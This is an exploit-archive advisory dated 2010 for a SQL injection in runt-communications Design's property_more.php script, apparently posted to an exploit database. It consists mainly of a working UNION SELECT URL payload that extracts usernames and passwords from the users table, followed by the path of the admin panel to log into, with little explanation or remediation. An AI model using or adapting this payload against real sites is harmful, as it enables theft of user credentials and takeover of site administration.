runt-communications Design (property_more.php) SQL Injec.Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : runt-communications Design (property_more.php) SQL Injec.Vulnerability
# Published : 2010-05-24
# Author : CoBRa_21
# Previous Title : e107 Code Exec
# Next Title : Telia Web Design (index.php) SQL Injection Vulnerability

-------------------------------------------------------------------------------------------

runt-communications Design (property_more.php) SQL Injection Vulnerability

-------------------------------------------------------------------------------------------

Author: CoBRa_21

Mail: uyku_cu@windowslive.com

Script Home: http://runtcommunications.com

-------------------------------------------------------------------------------------------

Sql Injection:

http://localhost/[path]/property_more.php?id=-9999 union select 0,version(),2,3,group_concat(username,0x3a,password),5,6,7,8,9,10,11 from users

Admin Panel

http://localhost/[path]/admin
-------------------------------------------------------------------------------------------